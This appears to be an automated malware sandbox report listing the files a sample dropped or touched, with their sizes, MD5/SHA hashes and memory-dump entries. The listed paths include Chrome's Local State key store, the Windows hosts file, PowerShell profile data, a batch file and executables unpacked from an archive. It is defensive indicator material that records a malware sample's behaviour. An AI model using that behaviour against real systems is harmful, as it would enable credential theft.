Filesize
14B

MD5
9eae63c7a967fc314dd311d9f46a45b7

SHA1
caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf

SHA256
4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d

SHA512
bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
287KB

MD5
777c895642904706c1c119759374a3e0

SHA1
9fdd6f9733c5ee71b84a74ffdefee91ac9780d09

SHA256
ad81b42ca4830111f4b13ef2f29b91f1e7ace51ddab9056dfd84c64e68d17197

SHA512
ea49dc18b8219f8db42e3831703ae50aa0fffd80c1a0e1fa6a99b377dd1014842ebd8427b9f91b705b65b8f6b9543ee285492ce3647414d3bfadc939556c81dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
287KB

MD5
706d2d8d879a306e11e4f166ed76250d

SHA1
1486fc4395dcbdadc7c9ccbf27fd65cc44f81b11

SHA256
cca0807e81b32b2daf072518b63737a825bd24c1513f7ca6387eafe1e434fb69

SHA512
2114ea1f26bf1d8edecdc126d801bf0ff305157e89e3d2f89a6a6cf91f9fb5c3cbbe30dd91cacaee6737990810133f4caf1625fd92a9c1d59398b9c7c81d7dda

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
104KB

MD5
6bd5edefde717757db6ec671229d931b

SHA1
b4ec04b96b224930a88df4473d0068b7a4ff1f5c

SHA256
01b0cbfbe3e4f8d1822e64514717b4aed1511cbd00b7181ff5a0dce7a21df717

SHA512
bb4166c6b4b404aceeadb6ff843549c79029b669bfada65bdf65a48d7ffaa4244bbdc07d6706e4b2399b8360a5afad3e865d56f0f7e61a7480d9324dc74d8679

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
103KB

MD5
608cfc17ce5c5104fbbc71830caac58a

SHA1
3128a9ce1b7a1a1f1520f98c5bf2901b6d8f8e5a

SHA256
bea8bdd7b222d4c7f67de91df169355a444fbf2c9a63f5deb28c2e4e888806bd

SHA512
02295c8f4b9d3a25b2754daac86df3251598d1042f38ca0b39de7daffb737e289c0383e74ed687a3582d5951c9d5e0a5393fb0157913c625ada92f4800b3a0a2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5931b5.TMP
Filesize
93KB

MD5
a06f6b7a847f4a0d8bc53cb62850d2bc

SHA1
44cca131cfde1cae862ddfead9f563b84f564702

SHA256
76632dc5b68a568c97cb1d58489670317581ca3fd62581f3eaae3a1e233bb40b

SHA512
fbf6891bacbdd5744d19cee8eb1303d5b09aab3f4ab22ef776e74a5369702caac7e3a7a70a54f8d7c8d59ffb4b3c8d213dadb89ba44c5993360f8391a108a9e4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
5d574dc518025fad52b7886c1bff0e13

SHA1
68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

SHA256
755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

SHA512
21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
58936da688ac2ee8963a953badb817e0

SHA1
1ca006eb71816a6bea2b03da30b964687f5a0e9e

SHA256
bec1e6fafd87f872d64555932fb483a2998f8cbc7080455b048ec7c7968dac92

SHA512
07e965ddb52d499d5250076e1810b0d179bade395a0768dc7eb6f08a8f1fcd796cfea5a1caa0abc5ac9deaab2a704cbbefa77aa4e4efebf7e691e910a7b08a5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
131c576779f7483370c395c256910304

SHA1
ee920fd35c2eaa9d62f96ee8986c42d6a96b26f2

SHA256
9399f7d299d2680edaf9b7517ba20399e6c89536fc2df9b6a677886dc957a8b4

SHA512
73a493787c68c997f6c87b3e361aabdc52c83686582cee61937cfa795bb8a8fcf67dbec69133e1452363b9db87e6c538d76884cf04fc0b1c5016385f6d613f58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
af9a9f5c919489eb0dd19d944ad35815

SHA1
3512094987b851caba495b4c79a69d406622477e

SHA256
406ea3ba9f3b594c2496a30ad4ad6b55948480cb5ab099eb40e670e33d25ed70

SHA512
1dd47ac314248687e3698568f4efab0e95f3f9a35938a217bd5f6fd268a47bc062acd2e9b4a32aa05072354ac2435fce0f4ad9117fce696d8f9455ee5f717384

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2c0313f14538ef9f1053da010f946582

SHA1
cecc0041e81e06cd4678ca57c3a6d78b0465ecbf

SHA256
7a237c8f64f6fb466573a949dbdb8bad656b3b8156ca25e2fb9f0f8e7d3dd175

SHA512
3067ea40e21f1ec6dc355bfe6eb17b9a3052d36ac64a8d97f0106ad76b3bae8e623c3f2343afe06ffa3a71c29b23e4ba2427a5f9e28242b784981efae5888845

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9cfc3dc0387083370005ecfe95dc6899

SHA1
fe818f52e7d4e022e0b3d45829d0f2f294da7842

SHA256
13b8ab6d0f06e2259acc0331801b71a3d15281234da16117d0e4b70c92073df3

SHA512
ed3dc742a0a16c97035f9948987880a7d17482ca2c0bba5ce489f8eaa7377cae7ead1d70ddace9bdbca9096a5e5edff55458eddbd7144f12b3667a2c648c497e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cache.rar
Filesize
2.3MB

MD5
6282b4c6aca3a1c55af6d1ed91d3c932

SHA1
cfb5bf824bbfd3ef9b49ef1f65c98f1f88c3a974

SHA256
a29cc0c6f3c244c8d257fa1ea5c10c463b4e26ef0f0ca010f0a917d7da69aee1

SHA512
92ac2ec23c1dd38b8b2a76ab237e30a0dd873d23aa2aaf7856089d451a95beb632b1417deea28fb6fb98fcc025afc3efcd9679e8c2384c4eefd5abbe27de28d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
Filesize
413KB

MD5
643a8e965f3f1331c2902a2a451c5200

SHA1
4a92181dc431a42e9a0c4aedb9df7c5b1b572173

SHA256
61c29cf71d338ee070804f4ec0e60f93dd2056840c95c9497bb03cf81a590ad5

SHA512
194f9c946d4d06bbe8a89999716024b79cd66df9da2c11e503cee216004e44fad01317229a84618a0cc406deb40ec7e23e1e53e23c426b2e6f2b3107e8f1baf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
Filesize
2.6MB

MD5
acc0ec089c7623d1460d205a9e45a1d9

SHA1
7abdb88df37e63cdaf4b6c99d2ec9c56d48815f8

SHA256
169ab660aad03e63b1db2619e471ed8679a6975c7d1d23f639b1b052a62c80fc

SHA512
3201636fc8808dcf6683125555365dd0cbef25dfd5fe934c090eaf120107cee53a762a9ee0b2946f4feb1a74a7ee36a1daaae3187a15c278a2b00fc27b64c7e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_504ku5as.uth.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Desktop\NursultanNextgen2024\kdotlbBcbF.bat
Filesize
182B

MD5
988dfb6afa81abbe75df1dada54b231c

SHA1
ce6941a0a8fdb5e00c1037b0f7657bcd7a63f830

SHA256
968bd350c1c19099f54691d26ce0b80649044f3fa5108bc665b7234e1b758dd5

SHA512
04c511d46351cdfc0ac3a6ba0e574a4d177ab9d55101c020ec8e1eca3049a87f4568bf460e13cf156970978c303c18c465a583efdafdd15a3455c492b5da7c11

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
4KB

MD5
747d7ddd27f695f5e07df8ff9bc44e28

SHA1
c33048412255744c3de6292238eae196791be25e

SHA256
8dac7d9b38f2811c76652717c7f93c2a6390f031149ed850ae9ddb7dedcfca55

SHA512
ca85efa05980bba8ced81cb41a66e05821a2a55382142bffd27e8945a34d0ec89a6e221f0f5e381c877adc8d639863c9c837b74401f8096af5e9417580766ffa

Download Submit
\??\pipe\crashpad_3896_USVQKOTDKSEYCDUY
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/400-873-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/400-879-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/400-869-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/400-878-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/400-871-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/400-874-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/400-870-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/400-877-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/400-876-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/400-875-0x000002A041820000-0x000002A041840000-memory.dmp

Filesize
128KB

Download
memory/400-872-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/400-868-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1948-278-0x00000149FC400000-0x00000149FC422000-memory.dmp

Filesize
136KB

Download
memory/1948-281-0x00000149FC6D0000-0x00000149FC746000-memory.dmp

Filesize
472KB

Download
memory/2456-769-0x00000205427E0000-0x00000205427EA000-memory.dmp

Filesize
40KB

Download
memory/2456-730-0x00000205427C0000-0x00000205427DC000-memory.dmp

Filesize
112KB

Download
memory/2456-736-0x0000020542F00000-0x0000020542FB9000-memory.dmp

Filesize
740KB

Download
memory/2940-598-0x00000000050C0000-0x0000000005126000-memory.dmp

Filesize
408KB

Download
memory/2940-658-0x0000000006C60000-0x000000000715E000-memory.dmp

Filesize
5.0MB

Download
memory/2940-657-0x0000000005CE0000-0x0000000005D72000-memory.dmp

Filesize
584KB

Download
memory/2940-597-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/4208-475-0x000001F1510C0000-0x000001F1510EA000-memory.dmp

Filesize
168KB

Download
memory/4208-494-0x000001F1510C0000-0x000001F1510E2000-memory.dmp

Filesize
136KB

Download
memory/4832-859-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4832-867-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4832-860-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4832-861-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4832-863-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4832-862-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download